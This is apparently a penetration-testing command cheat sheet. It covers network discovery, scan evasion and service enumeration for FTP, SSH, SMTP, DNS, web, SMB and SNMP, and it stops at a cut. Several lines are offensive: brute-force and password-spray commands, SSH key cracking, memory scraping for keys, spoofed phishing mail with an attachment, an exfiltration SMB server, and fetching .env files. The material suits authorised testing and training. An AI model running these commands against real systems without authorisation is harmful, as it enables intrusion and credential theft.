# Essential Variables - Set these at the beginning of your engagement
export TARGET_IP="10.10.10.100"           # Primary target IP
export TARGET_NETWORK="10.10.10.0/24"     # Target network CIDR
export DC_IP="10.10.10.1"                 # Domain Controller IP
export LHOST="10.10.14.5"                 # Your attacking machine IP (shorter var name)
export LPORT="443"                        # Your listener port
export DOMAIN="corp.local"                 # Target domain name

# ICMP ping (OS hint via TTL: Linux=64, Windows=128, Cisco=255)
ping -c 1 $TARGET_IP

# ICMP ping sweep (opsec: noisy, easily detected)
sudo nmap -sn -T3 $TARGET_NETWORK -oA ./recon/ping_sweep

# TCP SYN discovery (better for bypassing ICMP filters)
# Using common ports likely to be open
sudo nmap -sn -PS21,22,25,80,443,445,3389,5985 -T3 $TARGET_NETWORK -oA ./recon/syn_discovery

# Save discovered hosts
sudo nmap -sn $TARGET_NETWORK -oG - | awk '/Up$/{print $2}' > ./recon/live_hosts.txt

# ARP scan (local segment only, extremely reliable)
sudo arp-scan --interface=eth0 $TARGET_NETWORK | tee ./recon/arp_scan.txt
# Or with nmap
sudo nmap -sn -PR $TARGET_NETWORK -oA ./recon/arp_discovery

# Masscan (very fast; requires root; can overwhelm networks)
# Note: Reduced rate for better stability and stealth
sudo masscan $TARGET_NETWORK -p1-65535 --rate 5000 --wait 3 \
  -oG ./recon/masscan_results.txt

# Naabu (modern, faster than nmap for port discovery)
naabu -host $TARGET_IP -p - -rate 5000 -o $WORKSPACE/recon/naabu_results.txt
naabu -list $WORKSPACE/recon/live_hosts.txt -top-ports 1000 \
  -o ./recon/naabu_top_ports.txt

# Feed discovery results into nmap for service detection
awk '/open/{print $4, $5}' ./recon/masscan_results.txt | \
  awk '{print $1}' | sort -u > ./recon/targets_for_nmap.txt
sudo nmap -sV -sC -iL $WORKSPACE/recon/targets_for_nmap.txt \
  -oA ./enum/service_detection

# Multiple discovery probes (comprehensive but noisy)
sudo nmap -sn -PE -PP -PM -PS80,443,3389 -PA80,443 -PU53,161 \
  -T2 $TARGET_NETWORK -oA ./recon/multi_probe_discovery

# Scan from list with timing control
sudo nmap -sn -iL hosts.txt -T2 --min-rate 100 --max-rate 300 \
  -oA ./recon/host_discovery_from_list

# Firewall bypass with source port tricks (less effective on modern firewalls)
# DNS source port (port 53)
sudo nmap -sn --source-port 53 -T2 $TARGET_NETWORK \
  -oA ./recon/dns_source_discovery

# HTTP source port (port 80) 
sudo nmap -sn --source-port 80 -T2 $TARGET_NETWORK \
  -oA ./recon/http_source_discovery

# Idle scan (requires vulnerable zombie host - rarely useful in modern networks)
# First find zombie: nmap -O -v <potential_zombie>
sudo nmap -Pn -sI <zombie_host> -p- $TARGET_IP \
  -oA ./recon/idle_scan_results

# Decoy scan (mix your traffic with decoys - moderate opsec benefit)
sudo nmap -sS -D RND:10 $TARGET_IP -oA ./recon/decoy_scan

# MAC address spoofing (only works on local network segment)
sudo nmap -sn --spoof-mac Dell $TARGET_NETWORK
# Or specific MAC
sudo nmap -sn --spoof-mac 00:11:22:33:44:55 $TARGET_NETWORK

# Fast top 1000 ports scan
sudo nmap -sS -T4 --top-ports 1000 $TARGET_IP -oN tcp_top1000.txt

# Full TCP scan (all 65535 ports)
# Adjusted min-rate for reliability - too high causes missed ports
sudo nmap -sS -p- --min-rate 1000 -T4 $TARGET_IP -oN tcp_full.txt

# Alternative: Two-stage approach (fast discovery, then deep scan)
# Stage 1: Quick discovery
sudo nmap -sS -p- --min-rate 2000 -T4 $TARGET_IP -oG - | \
  grep "/open" | cut -d' ' -f2 | tr ',' '\n' | cut -d'/' -f1 | \
  sort -u | paste -sd, - > open_ports.txt

# Stage 2: Service detection on discovered ports
sudo nmap -sV -sC -p$(cat open_ports.txt) $TARGET_IP -oA tcp_services

# RustScan → Nmap (fastest method, but can be noisy)
rustscan -a $TARGET_IP -g --ulimit 5000 -- -sV -sC -oN rustscan_services.txt

# Service and script scanning
sudo nmap -sV -sC -p <open_ports> $TARGET_IP -oA tcp_detailed

# Aggressive scan (OS detection, traceroute, all NSE scripts)
# Warning: Very noisy, triggers most IDS/IPS
sudo nmap -A -p <ports> $TARGET_IP -oA tcp_aggressive

# Version intensity (increase for better fingerprinting)
sudo nmap -sV --version-intensity 9 -p <ports> $TARGET_IP -oA tcp_version_intense

# Stealthy scan (slower but quieter)
sudo nmap -sS -T2 -f --scan-delay 10ms --max-retries 1 \
  -p <ports> $TARGET_IP -oA tcp_stealth

# Top 100 UDP ports (UDP scanning is inherently slow)
sudo nmap -sU --top-ports 100 --min-rate 500 -T4 $TARGET_IP -oN udp_top100.txt

# Common UDP services (focused approach - recommended)
sudo nmap -sU -p 53,69,123,161,162,500,514,1434,4500,5353 \
  --min-rate 500 $TARGET_IP -oN udp_common.txt

# Full UDP scan (extremely slow, often impractical)
# Expect 18+ hours for complete scan
sudo nmap -sU -p- --min-rate 1000 -T4 $TARGET_IP -oN udp_full.txt

# Version detection on UDP (combine with --version-intensity)
sudo nmap -sU -sV --version-intensity 0 -p <udp_ports> $TARGET_IP -oN udp_services.txt

# UDP scan with TCP fallback for verification
sudo nmap -sU -sT -p U:161,T:22,80,443 $TARGET_IP -oA udp_tcp_combined

# Faster UDP alternative - udpprotoscanner
nc -nvu $TARGET_IP 161  # Manual UDP probe

# === SOURCE PORT MANIPULATION ===
# DNS source port (bypasses some firewall rules)
sudo nmap -sS --source-port 53 -Pn -p <ports> $TARGET_IP -oN source_port_53.txt

# FTP data port (legacy systems might trust port 20)
sudo nmap -sS --source-port 20 -Pn -p <ports> $TARGET_IP -oN source_port_20.txt

# === FRAGMENTATION ===
# Fragment packets (bypass packet inspection)
sudo nmap -sS -f -Pn -p <ports> $TARGET_IP -oN fragmented.txt

# Custom MTU (must be multiple of 8)
sudo nmap -sS --mtu 16 -Pn -p <ports> $TARGET_IP -oN mtu_16.txt

# === TIMING & EVASION ===
# Paranoid timing (extremely slow, 5 min between probes)
sudo nmap -sS -T0 -p <ports> $TARGET_IP -oN timing_paranoid.txt

# Sneaky timing (recommended for stealth)
sudo nmap -sS -T1 --scan-delay 5s --max-retries 2 -p <ports> $TARGET_IP \
  -oN timing_sneaky.txt

# Custom timing with randomization
sudo nmap -sS --scan-delay 3s --max-scan-delay 7s -p <ports> $TARGET_IP \
  -oN timing_random.txt

# === DATA LENGTH MANIPULATION ===
# Append random data to packets
sudo nmap -sS --data-length 25 -p <ports> $TARGET_IP -oN data_length.txt

# === DECOYS & SPOOFING ===
# Random decoys (creates multiple scan sources)
sudo nmap -sS -D RND:10 -p <ports> $TARGET_IP -oN decoy_scan.txt

# Specific decoys (mix real IPs in your network)
sudo nmap -sS -D 10.10.10.5,10.10.10.7,ME,10.10.10.9 \
  -p <ports> $TARGET_IP -oN specific_decoys.txt

# === BAD CHECKSUM (identifies firewalls vs hosts) ===
# Real hosts drop these, firewalls might respond
sudo nmap -sS --badsum -p <ports> $TARGET_IP -oN badsum_test.txt

# === COMBINED EVASION ===
# Maximum stealth (slow but effective)
sudo nmap -sS -f --mtu 24 --scan-delay 10s --max-retries 1 \
  -D RND:5 --source-port 53 -T1 --data-length 15 \
  -p <ports> $TARGET_IP -oN maximum_stealth.txt

# === PROXY CHAINS (external to nmap) ===
# Route through proxychains for additional obfuscation
# Edit /etc/proxychains4.conf first
proxychains4 nmap -sT -Pn -p <ports> $TARGET_IP -oN proxy_scan.txt

# Banner grabbing
nc -nv $TARGET_IP 21
telnet $TARGET_IP 21

# Anonymous login check
ftp $TARGET_IP
# Username: anonymous | Password: anonymous (or email address)

# Automated anonymous check
echo "user anonymous
anonymous
ls
bye" | ftp -n $TARGET_IP

# Nmap FTP scripts
sudo nmap -sV -p 21 --script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221 $TARGET_IP -oN ftp_scripts.txt

# All FTP scripts (comprehensive)
sudo nmap -sV -p 21 --script "ftp-*" $TARGET_IP -oN ftp_all_scripts.txt

# Brute force (consider account lockout policies)
hydra -l admin -P /usr/share/wordlists/rockyou.txt ftp://$TARGET_IP -t 4 -V
# Multiple usernames
hydra -L users.txt -P passwords.txt ftp://$TARGET_IP -t 4 -V

# NetExec FTP module (modern alternative)
nxc ftp $TARGET_IP -u anonymous -p ''
nxc ftp $TARGET_IP -u admin -p passwords.txt

# Recursive download (opsec: leaves logs)
wget -r ftp://anonymous:anonymous@$TARGET_IP/
wget -m ftp://username:password@$TARGET_IP/  # Mirror mode

# Curl alternative for single file
curl -u username:password ftp://$TARGET_IP/file.txt -o file.txt

# Check for FTP bounce attack (mostly patched)
sudo nmap -p 21 --script ftp-bounce --script-args ftp-bounce.username=anonymous,ftp-bounce.password=anonymous $TARGET_IP

# TLS/SSL FTP (FTPS) enumeration
openssl s_client -connect $TARGET_IP:21 -starttls ftp
nmap -sV -p 21 --script ssl-enum-ciphers $TARGET_IP

# SSH banner and supported algorithms
ssh -v $TARGET_IP 2>&1 | grep "remote software version"
nc -nv $TARGET_IP 22

# SSH audit (comprehensive security check)
ssh-audit $TARGET_IP > ssh_audit_report.txt

# Nmap SSH enumeration
sudo nmap -sV -p 22 --script ssh2-enum-algos,ssh-hostkey,ssh-auth-methods $TARGET_IP -oN ssh_enum.txt

# Check supported authentication methods
ssh -o PreferredAuthentications=publickey $TARGET_IP
ssh -o PreferredAuthentications=password $TARGET_IP

# User enumeration (CVE-2018-15473) - patched in OpenSSH 7.7+
# Use with caution, may not work on modern systems
python3 ssh_user_enum.py --port 22 --threads 5 --outputFile ssh_users.txt $TARGET_IP

# Username enumeration via timing attacks (alternative)
# https://github.com/epi052/cve-2018-15473
python3 ssh-username-enum.py --port 22 $TARGET_IP root admin test

# Brute force (consider fail2ban and account lockouts)
hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://$TARGET_IP -t 4 -V
# Spray attack (single password, multiple users)
hydra -L users.txt -p 'Password123!' ssh://$TARGET_IP -t 4 -V

# NetExec SSH
nxc ssh $TARGET_IP -u username -p password
nxc ssh $TARGET_IP -u users.txt -p passwords.txt --continue-on-success

# Private key authentication
chmod 600 id_rsa
ssh -i id_rsa user@$TARGET_IP

# Ignore host key checking (testing only)
ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -i id_rsa user@$TARGET_IP

# SSH tunneling and pivoting
# Local port forward (access remote service through SSH)
ssh -L 8080:127.0.0.1:80 user@$TARGET_IP

# Remote port forward (expose local service to remote network)
ssh -R 8080:127.0.0.1:80 user@$TARGET_IP

# Dynamic SOCKS proxy (use with proxychains)
ssh -D 1080 user@$TARGET_IP
# Then: proxychains4 nmap -sT -Pn 10.10.10.0/24

# ProxyJump / Jump host
ssh -J user@jumphost user@$TARGET_IP

# Cracking encrypted private keys
python /usr/share/john/ssh2john.py id_rsa > ssh_hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt ssh_hash.txt
# Or with hashcat
hashcat -m 22921 ssh_hash.txt /usr/share/wordlists/rockyou.txt

# Extract SSH keys from memory (if you have access)
grep -a -o -E 'ssh-(rsa|dss|ed25519) [A-Za-z0-9+/]+' /proc/*/mem 2>/dev/null

# Connect to telnet
telnet $TARGET_IP 23
nc -nv $TARGET_IP 23

# Banner grabbing
echo "" | nc -nv $TARGET_IP 23 | head -n 5
timeout 5 telnet $TARGET_IP 23

# Nmap telnet scripts
sudo nmap -p 23 --script telnet-encryption,telnet-ntlm-info $TARGET_IP -oN telnet_enum.txt

# Brute force
hydra -l admin -P /usr/share/wordlists/rockyou.txt telnet://$TARGET_IP -t 4 -V
medusa -h $TARGET_IP -u admin -P passwords.txt -M telnet

# NetExec telnet (if available in your version)
nxc telnet $TARGET_IP -u admin -p passwords.txt

# Common default credentials
# Try: admin/admin, root/root, cisco/cisco, admin/password

# Banner and commands
nc -nv $TARGET_IP 25
# Commands to try:
# EHLO test.com
# HELP
# VRFY root
# EXPN root
# MAIL FROM: <test@test.com>
# RCPT TO: <admin@target.com>

# Telnet SMTP interaction
telnet $TARGET_IP 25
# EHLO attacker.com

# User enumeration via VRFY
smtp-user-enum -M VRFY -U /usr/share/seclists/Usernames/Names/names.txt -t $TARGET_IP -w 10
# Via EXPN
smtp-user-enum -M EXPN -U users.txt -t $TARGET_IP
# Via RCPT (most reliable on modern servers)
smtp-user-enum -M RCPT -U users.txt -D target.com -t $TARGET_IP

# Nmap SMTP scripts
sudo nmap -p 25,465,587 --script smtp-commands,smtp-enum-users,smtp-open-relay,smtp-vuln-* $TARGET_IP -oN smtp_enum.txt

# SMTP relay testing
swaks --to test@example.com --from attacker@evil.com --server $TARGET_IP
swaks --to internal@target.com --from external@attacker.com --server $TARGET_IP --body "Test relay"

# SMTP with authentication (port 587)
swaks --to victim@target.com --from sender@target.com \
  --server $TARGET_IP:587 \
  --auth-user username --auth-password password \
  --header "Subject: Test" --body "Test message"

# SMTPS (port 465) testing
swaks --to test@target.com --from test@attacker.com \
  --server $TARGET_IP:465 --tls

# Send email with attachment (phishing simulation)
swaks --to victim@target.com \
  --from admin@target.com \
  --server $TARGET_IP \
  --header "Subject: Urgent: Security Update Required" \
  --body "Please review the attached document immediately." \
  --attach @payload.pdf

# Enumerate users via RCPT TO manually
telnet $TARGET_IP 25
EHLO attacker.com
MAIL FROM: <test@test.com>
RCPT TO: <admin@target.com>  # 250 = user exists, 550 = doesn't exist

# SMTP version detection
sudo nmap -sV -p 25,465,587 --script banner $TARGET_IP

# Basic DNS queries
nslookup $TARGET_IP
dig @$TARGET_IP target.com
host target.com $TARGET_IP

# DNS server version (often disabled)
dig @$TARGET_IP version.bind chaos txt
dig @$TARGET_IP version.server chaos txt
nmap -sU -p 53 --script dns-nsid $TARGET_IP

# Zone transfer attempts (AXFR)
dig axfr @$TARGET_IP target.com
host -l target.com $TARGET_IP
fierce --domain target.com --dns-servers $TARGET_IP

# Comprehensive DNS reconnaissance
dnsrecon -d target.com -n $TARGET_IP -t axfr,brt,srv,std
dnsrecon -d target.com -n $TARGET_IP -D /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -t brt

# Subdomain enumeration
gobuster dns -d target.com -r $TARGET_IP -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -t 50
# Modern alternatives
subfinder -d target.com -r $TARGET_IP -silent -o subdomains.txt
amass enum -d target.com -o amass_results.txt

# DNS cache snooping (check if domains are cached)
nmap -sU -p 53 --script dns-cache-snoop --script-args 'dns-cache-snoop.domains={google.com,facebook.com,target.com}' $TARGET_IP

# DNS recursion check
nmap -sU -p 53 --script dns-recursion $TARGET_IP
dig @$TARGET_IP google.com  # If you get an answer, recursion is enabled

# Reverse DNS lookup
dig -x $TARGET_IP @$TARGET_IP
nmap -sL $TARGET_NETWORK  # Reverse DNS for range

# DNS ANY query (enumerate all records)
dig @$TARGET_IP target.com ANY

# Specific record types
dig @$TARGET_IP target.com A      # IPv4 addresses
dig @$TARGET_IP target.com AAAA   # IPv6 addresses
dig @$TARGET_IP target.com MX     # Mail servers
dig @$TARGET_IP target.com NS     # Name servers
dig @$TARGET_IP target.com TXT    # Text records (SPF, DKIM, etc.)
dig @$TARGET_IP target.com SOA    # Start of authority
dig @$TARGET_IP target.com SRV    # Service records

# DNSSEC validation check
dig @$TARGET_IP target.com +dnssec

# DNS tunneling detection (if you suspect data exfiltration)
tcpdump -i eth0 -n port 53 -w dns_traffic.pcap

# === FINGERPRINTING & RECONNAISSANCE ===

# Web application fingerprinting
whatweb -a 3 -v http://$TARGET_IP | tee whatweb_results.txt
# WAF detection
wafw00f http://$TARGET_IP -a

# HTTP headers and methods
curl -I http://$TARGET_IP
curl -i -X OPTIONS http://$TARGET_IP

# Detailed header analysis
curl -v http://$TARGET_IP 2>&1 | grep -E "^< |^> "

# Test HTTP methods (PUT, DELETE, etc.)
curl -X PUT -d "test" http://$TARGET_IP/test.txt
curl -X DELETE http://$TARGET_IP/test.txt
nmap -p 80,443 --script http-methods $TARGET_IP

# Nikto scan (noisy but comprehensive)
nikto -h http://$TARGET_IP -C all -output nikto_results.txt
nikto -h http://$TARGET_IP -Tuning 123bde  # Specific tests

# SSL/TLS analysis (HTTPS)
sslscan $TARGET_IP:443
sslyze --regular $TARGET_IP:443
testssl.sh https://$TARGET_IP

# Certificate information
openssl s_client -connect $TARGET_IP:443 </dev/null 2>/dev/null | openssl x509 -noout -text
# Extract SANs (Subject Alternative Names) for additional domains
openssl s_client -connect $TARGET_IP:443 </dev/null 2>/dev/null | openssl x509 -noout -text | grep -A1 "Subject Alternative Name"

# Nmap HTTP scripts
sudo nmap -p 80,443,8080,8443 --script http-enum,http-headers,http-methods,http-webdav-scan,http-shellshock,http-sql-injection $TARGET_IP -oN http_nmap.txt

# === DIRECTORY & FILE DISCOVERY ===

# Gobuster (recommended)
gobuster dir -u http://$TARGET_IP \
  -w /usr/share/seclists/Discovery/Web-Content/common.txt \
  -x php,html,txt,asp,aspx,jsp,js,bak,old,zip,tar,gz,sql,json,xml,config,conf,log \
  -b 404,403 -t 50 -o gobuster_common.txt

# Medium wordlist scan
gobuster dir -u http://$TARGET_IP \
  -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt \
  -x php,html,txt -b 404,403 -t 50 -o gobuster_medium.txt

# Feroxbuster (recursive, auto-tuning)
feroxbuster -u http://$TARGET_IP \
  -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt \
  -x php,html,txt,asp,aspx,jsp,bak,old,zip \
  -t 50 -C 404,403 --auto-tune --random-agent -o feroxbuster_results.txt

# Dirsearch (alternative)
dirsearch -u http://$TARGET_IP \
  -e php,html,txt,asp,aspx,jsp,js,bak,old,zip \
  -x 404,403 -t 50 -o dirsearch_results.txt

# ffuf (fast, flexible)
ffuf -u http://$TARGET_IP/FUZZ \
  -w /usr/share/seclists/Discovery/Web-Content/common.txt \
  -mc 200,204,301,302,307,401,403,405 \
  -o ffuf_results.json -of json

# Recursive directory scan (once you find something)
gobuster dir -u http://$TARGET_IP/found_directory \
  -w /usr/share/seclists/Discovery/Web-Content/common.txt \
  -x php,txt -t 30

# === VIRTUAL HOST DISCOVERY ===

# VHost fuzzing with ffuf
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
  -u http://$TARGET_IP \
  -H "Host: FUZZ.target.com" \
  -ac -o vhosts_results.json -of json

# VHost fuzzing with gobuster
gobuster vhost -u http://target.com \
  -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
  --append-domain -t 50

# Filter by response size (manual)
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
  -u http://$TARGET_IP \
  -H "Host: FUZZ.target.com" \
  -fs 1234  # Filter response size

# === PARAMETER FUZZING ===

# GET parameter discovery
ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt \
  -u "http://$TARGET_IP/page.php?FUZZ=test" \
  -fs 1234 -mc 200

# POST parameter fuzzing
ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt \
  -u "http://$TARGET_IP/login.php" \
  -X POST -d "FUZZ=test" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -fs 1234

# Arjun (parameter discovery tool)
arjun -u http://$TARGET_IP/page.php -oJ arjun_params.json

# === VULNERABILITY SCANNING ===

# Nuclei (modern, template-based)
nuclei -u http://$TARGET_IP -t cves/ -o nuclei_cves.txt
nuclei -u http://$TARGET_IP -t vulnerabilities/ -o nuclei_vulns.txt
nuclei -u http://$TARGET_IP -t exposures/ -o nuclei_exposures.txt
# All templates
nuclei -u http://$TARGET_IP -severity critical,high,medium -o nuclei_all.txt

# XSS scanning
dalfox url http://$TARGET_IP/page.php?param=value
# Or
nuclei -u http://$TARGET_IP -t xss/

# SQL injection testing
sqlmap -u "http://$TARGET_IP/page.php?id=1" --batch --random-agent
sqlmap -u "http://$TARGET_IP/page.php?id=1" --batch --dbs --random-agent
# POST request
sqlmap -u "http://$TARGET_IP/login.php" --data="user=admin&pass=test" --batch --random-agent

# LFI/RFI fuzzing
ffuf -w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt \
  -u "http://$TARGET_IP/page.php?file=FUZZ" \
  -mc 200 -fs 1234

# Command injection
commix --url="http://$TARGET_IP/page.php?cmd=test"

# === CONTENT MANAGEMENT SYSTEMS ===

# WordPress
wpscan --url http://$TARGET_IP --enumerate ap,at,u --api-token YOUR_TOKEN
# Brute force WordPress
wpscan --url http://$TARGET_IP --passwords /usr/share/wordlists/rockyou.txt --usernames admin

# Joomla
joomscan --url http://$TARGET_IP

# Drupal
droopescan scan drupal -u http://$TARGET_IP

# === API ENUMERATION ===

# API endpoint discovery
gobuster dir -u http://$TARGET_IP/api \
  -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt \
  -t 30

# Common API paths to check manually
curl http://$TARGET_IP/api/v1/
curl http://$TARGET_IP/api/v2/
curl http://$TARGET_IP/swagger.json
curl http://$TARGET_IP/api-docs
curl http://$TARGET_IP/openapi.json
curl http://$TARGET_IP/graphql

# GraphQL introspection
curl -X POST http://$TARGET_IP/graphql \
  -H "Content-Type: application/json" \
  -d '{"query":"{ __schema { types { name } } }"}'

# === WEB APPLICATION FIREWALL BYPASS ===

# User-agent rotation
gobuster dir -u http://$TARGET_IP -w wordlist.txt --random-agent
ffuf -u http://$TARGET_IP/FUZZ -w wordlist.txt -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"

# Rate limiting bypass (slower scans)
gobuster dir -u http://$TARGET_IP -w wordlist.txt -t 10 --delay 500ms

# Proxy through Burp Suite for manual testing
export http_proxy=http://127.0.0.1:8080
export https_proxy=http://127.0.0.1:8080

# === MISCELLANEOUS ===

# Robots.txt and sitemap
curl http://$TARGET_IP/robots.txt
curl http://$TARGET_IP/sitemap.xml

# Common sensitive files
curl http://$TARGET_IP/.git/config
curl http://$TARGET_IP/.env
curl http://$TARGET_IP/web.config
curl http://$TARGET_IP/.htaccess
curl http://$TARGET_IP/backup.zip

# Screenshot (for reporting)
gowitness single http://$TARGET_IP
eyewitness --web --single http://$TARGET_IP

# WebDAV testing
cadaver http://$TARGET_IP
davtest -url http://$TARGET_IP

# HTTP/2 and HTTP/3 testing
curl --http2 https://$TARGET_IP
curl --http3 https://$TARGET_IP

# === BASIC ENUMERATION ===

# SMB share listing (anonymous)
smbclient -L //$TARGET_IP -N
smbclient -L //$TARGET_IP -U guest%

# SMB version detection
sudo nmap -p 445 --script smb-protocols $TARGET_IP -oN smb_version.txt
smbclient -L //$TARGET_IP -N 2>&1 | grep "Domain="

# NetExec (formerly CrackMapExec) - modern tool
nxc smb $TARGET_IP
nxc smb $TARGET_IP -u '' -p '' --shares
nxc smb $TARGET_IP -u guest -p '' --shares
nxc smb $TARGET_IP -u guest -p '' --users
nxc smb $TARGET_IP -u guest -p '' --groups
nxc smb $TARGET_IP -u guest -p '' --pass-pol
nxc smb $TARGET_IP -u guest -p '' --rid-brute

# Enum4linux-ng (modern rewrite)
enum4linux-ng $TARGET_IP -A -oY enum4linux_results.yaml

# Legacy enum4linux (if needed)
enum4linux -a $TARGET_IP | tee enum4linux_legacy.txt

# NetBIOS enumeration
nbtscan -r $TARGET_NETWORK
sudo nmap -sU -p 137 --script nbstat $TARGET_IP

# === SMB NULL SESSION ENUMERATION ===

# Check for null session
smbclient -N -L //$TARGET_IP
rpcclient -U "" -N $TARGET_IP
# Commands in rpcclient:
# enumdomusers, enumdomgroups, queryuser <RID>, querygroupmem <RID>

# Null session user enumeration via RPC
rpcclient -U "" -N $TARGET_IP -c "enumdomusers" | cut -d '[' -f2 | cut -d ']' -f1

# SMB shares with null session
smbmap -H $TARGET_IP
smbmap -H $TARGET_IP -r  # Recursive listing

# NetExec null session
nxc smb $TARGET_IP -u '' -p '' --shares --users --groups

# === AUTHENTICATED ENUMERATION ===

# With credentials
smbclient //$TARGET_IP/SHARENAME -U username%password
smbclient //$TARGET_IP/SHARENAME -U 'DOMAIN\username%password'

# SMBmap with credentials
smbmap -H $TARGET_IP -u username -p password
smbmap -H $TARGET_IP -u username -p password -r SHARENAME  # Recursive
smbmap -H $TARGET_IP -u username -p password -R  # Recursive all shares

# Download files
smbmap -H $TARGET_IP -u username -p password --download 'SHARENAME\path\file.txt'
# Upload files
smbmap -H $TARGET_IP -u username -p password --upload '/local/file.txt' 'SHARENAME\file.txt'

# NetExec authenticated enumeration
nxc smb $TARGET_IP -u username -p password --shares
nxc smb $TARGET_IP -u username -p password --users
nxc smb $TARGET_IP -u username -p password --groups
nxc smb $TARGET_IP -u username -p password --local-groups
nxc smb $TARGET_IP -u username -p password --pass-pol
nxc smb $TARGET_IP -u username -p password --sessions
nxc smb $TARGET_IP -u username -p password --disks
nxc smb $TARGET_IP -u username -p password --loggedon-users

# Spider shares
nxc smb $TARGET_IP -u username -p password -M spider_plus
nxc smb $TARGET_IP -u username -p password -M spider_plus -o READ_ONLY=false

# === MOUNTING SMB SHARES ===

# Mount SMB share
sudo mkdir -p /mnt/smb
sudo mount -t cifs //$TARGET_IP/SHARENAME /mnt/smb -o username=user,password=pass
# Guest mount
sudo mount -t cifs //$TARGET_IP/SHARENAME /mnt/smb -o guest

# Unmount
sudo umount /mnt/smb

# Mount with domain
sudo mount -t cifs //$TARGET_IP/SHARENAME /mnt/smb -o username=user,password=pass,domain=DOMAIN

# === VULNERABILITY SCANNING ===

# SMB vulnerability scanning
sudo nmap -p 445 --script smb-vuln-* $TARGET_IP -oN smb_vulns.txt

# Specific vulnerabilities
sudo nmap -p 445 --script smb-vuln-ms17-010 $TARGET_IP  # EternalBlue
sudo nmap -p 445 --script smb-vuln-ms08-067 $TARGET_IP
sudo nmap -p 445 --script smb-vuln-cve-2017-7494 $TARGET_IP  # SambaCry

# NetExec vulnerability checks
nxc smb $TARGET_IP -u username -p password -M ms17-010
nxc smb $TARGET_IP -u username -p password -M petitpotam
nxc smb $TARGET_IP -u username -p password -M zerologon

# === BRUTE FORCING ===

# Hydra
hydra -l administrator -P /usr/share/wordlists/rockyou.txt smb://$TARGET_IP -t 4 -V

# NetExec password spraying (opsec: single password, multiple users)
nxc smb $TARGET_IP -u users.txt -p 'Password123!' --continue-on-success
# Brute force single user
nxc smb $TARGET_IP -u administrator -p passwords.txt

# SMB relay attacks (see later sections for advanced attacks)

# === NTLM RELAY CHECKS ===

# Check if SMB signing is required (relay attack prerequisite)
nxc smb $TARGET_IP --gen-relay-list relay_targets.txt
sudo nmap -p 445 --script smb2-security-mode $TARGET_IP

# NetExec signing check
nxc smb $TARGET_NETWORK -u '' -p '' --gen-relay-list relay_targets.txt

# === SMB ENUMERATION WITH IMPACKET ===

# Lookupsid (RID cycling)
lookupsid.py anonymous@$TARGET_IP
lookupsid.py domain/username:password@$TARGET_IP

# SMB client (Impacket)
smbclient.py domain/username:password@$TARGET_IP

# SMB server (for exfiltration)
impacket-smbserver share /path/to/share -smb2support
# Without authentication
impacket-smbserver share /path/to/share -smb2support -username user -password pass

# === NETBIOS/WINS ENUMERATION ===

# NetBIOS name query
nmblookup -A $TARGET_IP

# WINS query
nmap -sU -p 137 --script nbstat $TARGET_IP

# === ADDITIONAL TOOLS ===

# Smbget (recursive download)
smbget -R smb://$TARGET_IP/SHARENAME -U username%password

# SMB shell (if you have credentials)
smbclient //$TARGET_IP/C$ -U administrator%password

# === BASIC ENUMERATION ===

# SNMP version detection
sudo nmap -sU -p 161 --script snmp-info $TARGET_IP -oN snmp_info.txt

# Check SNMP service
onesixtyone $TARGET_IP public

# SNMP v1/v2c community string brute force
onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt $TARGET_IP
onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt $TARGET_IP

# Hydra SNMP brute force
hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt snmp://$TARGET_IP

# NetExec SNMP (if available)
nxc snmp $TARGET_IP -c public
nxc snmp $TARGET_IP -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt

# === SNMP WALKING (DATA EXTRACTION) ===

# SNMPv1 walk
snmpwalk -v1 -c public $TARGET_IP | tee snmp_v1_walk.txt
snmpwalk -v1 -c public $TARGET_IP 1 | tee snmp_full_walk.txt

# SNMPv2c walk
snmpwalk -v2c -c public $TARGET_IP | tee snmp_v2c_walk.txt

# SNMPv3 walk (requires authentication)
snmpwalk -v3 -u username -l authPriv -a SHA -A authpassword -x AES -X privpassword $TARGET_IP

# Specific OID queries
snmpwalk -v2c -c public $TARGET_IP 1.3.6.1.2.1.1  # System info
snmpwalk -v2c -c public $TARGET_IP 1.3.6.1.2.1.25.4.2.1.2  # Running processes
snmpwalk -v2c -c public $TARGET_IP 1.3.6.1.2.1.25.6.3.1.2  # Installed software
snmpwalk -v2c -c public $TARGET_IP 1.3.6.1.2.1.6.13.1.3  # TCP connections
snmpwalk -v2c -c public $TARGET_IP 1.3.6.1.2.1.25.1.6.0  # System processes
snmpwalk -v2c -c public $TARGET_IP 1.3.6.1.4.1.77.1.2.25  # Windows users

# === SNMP ENUMERATION WITH NSE ===

# Nmap SNMP scripts
sudo nmap -sU -p 161 --script snmp-brute $TARGET_IP
sudo nmap -sU -p 161 --script snmp-info,snmp-interfaces,snmp-netstat,snmp-processes,snmp-sysdescr $TARGET_IP -oN snmp_nmap.txt
sudo nmap -sU -p 161 --script snmp-win32-users,snmp-win32-services,snmp-win32-shares,snmp-win32-software $TARGET_IP

# === SNMP-CHECK (COMPREHENSIVE) ===

# snmp-check (detailed enumeration)
snmp-check -c public $TARGET_IP | tee snmp_check.txt
snmp-check -v 2c -c public $TARGET_IP

# === BRAA (FAST SNMP SCANNER) ===

# Braa for mass SNMP queries
